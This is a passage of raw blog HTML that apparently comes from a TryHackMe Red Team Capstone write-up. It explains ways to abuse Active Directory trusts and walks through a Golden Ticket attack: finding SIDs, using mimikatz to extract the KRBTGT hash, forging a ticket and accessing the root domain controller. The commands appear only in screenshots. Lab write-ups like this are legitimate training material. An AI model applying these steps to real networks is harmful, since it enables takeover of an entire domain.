https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091949.png?resize=768%2C291&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091949.png?w=1227&amp;ssl=1 1227w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can see that there is a <code>Bideirectional<\/code> Domain trust between the two domains.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911a02d&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911a02d\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"555\" data-attachment-id=\"515\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240207092538-1\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207092538-1.png?fit=1365%2C740&amp;ssl=1\" data-orig-size=\"1365,740\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240207092538-1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207092538-1.png?fit=1024%2C555&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207092538-1.png?resize=1024%2C555&#038;ssl=1\" alt=\"\" class=\"wp-image-515\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207092538-1.png?resize=1024%2C555&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207092538-1.png?resize=300%2C163&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207092538-1.png?resize=768%2C416&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207092538-1.png?w=1365&amp;ssl=1 1365w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Bidirectional domain trusts allow two Active Directory domains to trust each other, meaning users and resources from one domain can access resources in the other domain, and vice versa. Here are some common ways attackers abuse bidirectional domain trusts:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Pass-the-Ticket (PtT) Attacks<\/strong>: With access to one domain, attackers can use PtT attacks to obtain Ticket Granting Tickets (TGTs) for users in the trusted domain. These TGTs can then be used to authenticate to resources in the trusted domain, allowing the attacker to move laterally.<\/li>\n\n\n\n<li><strong>Pass-the-Hash (PtH) Attacks<\/strong>: Similar to PtT attacks, PtH attacks involve stealing password hashes of privileged accounts in one domain and using them to authenticate to resources in the trusted domain. This allows attackers to move laterally without needing to know the plaintext passwords.<\/li>\n\n\n\n<li><strong>Golden Ticket Attacks<\/strong>: Attackers can forge Kerberos tickets, known as Golden Tickets, using the KRBTGT account&#8217;s password hash from one domain and the trust relationship between the domains. With a Golden Ticket, attackers gain unrestricted access to any resource in the trusted domain.<\/li>\n\n\n\n<li><strong>Silver Ticket Attacks<\/strong>: Silver Ticket attacks involve forging Service Principal Name (SPN) tickets to impersonate specific services in the trusted domain. This allows attackers to access resources associated with those SPNs without needing the service account&#8217;s credentials.<\/li>\n\n\n\n<li><strong>Abusing AdminSDHolder<\/strong>: If the domains have differing security postures or if the trust is not properly configured, attackers may abuse AdminSDHolder, a mechanism in Active Directory that enforces permissions on sensitive accounts like Domain Admins. By escalating privileges or modifying permissions through AdminSDHolder, attackers can gain unauthorized access to critical accounts and resources in the trusted domain.<\/li>\n\n\n\n<li><strong>Exploiting Misconfigurations<\/strong>: Attackers may look for misconfigurations in the trust relationship, such as weak authentication settings or improper trust permissions. Exploiting these misconfigurations can provide avenues for unauthorized access and lateral movement.<\/li>\n<\/ol>\n\n\n\n<p>We can go for the <code>Golden Ticket<\/code> attack and try to impersonate a user (Administrator) with high privileges on the ROOTDC.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"32-golden-ticket-attack-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Golden Ticket Attack<\/mark><\/h3>\n\n\n\n<p>A Golden Ticket attack is a sophisticated form of cyber attack that involves forging Kerberos tickets to gain unauthorized access to a Windows Active Directory environment. In Kerberos authentication, tickets are used to prove the identity of users and services within the domain. The Ticket Granting Ticket (TGT) is a crucial component in this process, as it grants access to various resources across the domain.<\/p>\n\n\n\n<p>In a Golden Ticket attack, the attacker gains access to the KRBTGT account&#8217;s password hash, which is a privileged account used by the Key Distribution Center (KDC) to encrypt TGTs. With the KRBTGT password hash, the attacker can create a forged TGT that grants them unrestricted access to any resource in the Active Directory domain.<\/p>\n\n\n\n<p><strong>The key steps involved in a Golden Ticket attack include:<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Obtaining KRBTGT Password Hash<\/strong>: Attackers typically gain access to the KRBTGT password hash through various means, such as compromising a domain controller, using Mimikatz to extract the hash from memory, or exploiting vulnerabilities.<\/li>\n\n\n\n<li><strong>Forging the TGT<\/strong>: Using the KRBTGT password hash, the attacker generates a forged TGT with arbitrary user credentials, group memberships, and privileges. The attacker can set the ticket&#8217;s lifetime to a long duration, allowing prolonged access to the domain.<\/li>\n\n\n\n<li><strong>Injecting the TGT<\/strong>: The forged TGT is then injected into the attacker&#8217;s session, effectively impersonating a legitimate user with elevated privileges within the domain.<\/li>\n\n\n\n<li><strong>Accessing Resources<\/strong>: With the Golden Ticket in hand, the attacker can access any resource within the domain, including sensitive data, systems, and services. Since the forged TGT contains arbitrary user credentials, the attacker can bypass authentication checks and perform actions as if they were a legitimate user with full domain privileges.<\/li>\n<\/ol>\n\n\n\n<p>So to carry out this attack we will need:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The KRBTGT password hash<\/li>\n\n\n\n<li>The Security Identifier (SID) of the (CORPDC) Domain<\/li>\n\n\n\n<li>The user account we want to impersonate (Administrator)<\/li>\n<\/ul>\n\n\n\n<p>To make our attack more advanced, we can also inject the SID for the <code>Enterprise Admins<\/code> group so that the user we impersonate would have high privileges. This will give us access to all the machines in the entire Forest if we are successful in doing so.<\/p>\n\n\n\n<p>Let&#8217;s get the SIDs for the CORPDC and the Enterprise Admins group.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911ab19&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911ab19\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"301\" data-attachment-id=\"516\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210155035\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210155035.png?fit=1046%2C307&amp;ssl=1\" data-orig-size=\"1046,307\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210155035\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210155035.png?fit=1024%2C301&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210155035.png?resize=1024%2C301&#038;ssl=1\" alt=\"\" class=\"wp-image-516\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210155035.png?resize=1024%2C301&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210155035.png?resize=300%2C88&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210155035.png?resize=768%2C225&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210155035.png?w=1046&amp;ssl=1 1046w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911b039&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911b039\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"226\" data-attachment-id=\"517\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240207093325\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207093325.png?fit=1313%2C290&amp;ssl=1\" data-orig-size=\"1313,290\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240207093325\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207093325.png?fit=1024%2C226&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207093325.png?resize=1024%2C226&#038;ssl=1\" alt=\"\" class=\"wp-image-517\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207093325.png?resize=1024%2C226&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207093325.png?resize=300%2C66&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207093325.png?resize=768%2C170&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207093325.png?w=1313&amp;ssl=1 1313w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>To get the KRBTGT hash and also to forge the Golden Ticket, we will need <code>mimikatz.exe<\/code>. We will transfer the mimikatz binary the same way we got the PowerView on the CORPDC machine.<\/p>\n\n\n\n<p>Let&#8217;s get the KRBTGT hash first.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911b617&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911b617\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"668\" data-attachment-id=\"518\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240207200021\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200021.png?fit=1106%2C722&amp;ssl=1\" data-orig-size=\"1106,722\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240207200021\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200021.png?fit=1024%2C668&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200021.png?resize=1024%2C668&#038;ssl=1\" alt=\"\" class=\"wp-image-518\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200021.png?resize=1024%2C668&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200021.png?resize=300%2C196&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200021.png?resize=768%2C501&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200021.png?w=1106&amp;ssl=1 1106w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We now have all the information we need to forge the Golden Ticket which will be injected in our current session.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911bbc2&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911bbc2\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"293\" data-attachment-id=\"519\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240207200133\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200133.png?fit=1596%2C457&amp;ssl=1\" data-orig-size=\"1596,457\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240207200133\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200133.png?fit=1024%2C293&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200133.png?resize=1024%2C293&#038;ssl=1\" alt=\"\" class=\"wp-image-519\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200133.png?resize=1024%2C293&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200133.png?resize=300%2C86&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200133.png?resize=768%2C220&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200133.png?resize=1536%2C440&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200133.png?w=1596&amp;ssl=1 1596w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The output indicates that we have successfully impersonated the user. We can quickly test if our attack worked by trying to list out the shares on the ROOTDC machine.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911c2d9&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911c2d9\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"811\" height=\"465\" data-attachment-id=\"520\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240207200451\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200451.png?fit=811%2C465&amp;ssl=1\" data-orig-size=\"811,465\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240207200451\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200451.png?fit=811%2C465&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200451.png?resize=811%2C465&#038;ssl=1\" alt=\"\" class=\"wp-image-520\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200451.png?w=811&amp;ssl=1 811w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200451.png?resize=300%2C172&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200451.png?resize=768%2C440&amp;ssl=1 768w\" sizes=\"auto, (max-width: 811px) 100vw, 811px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" 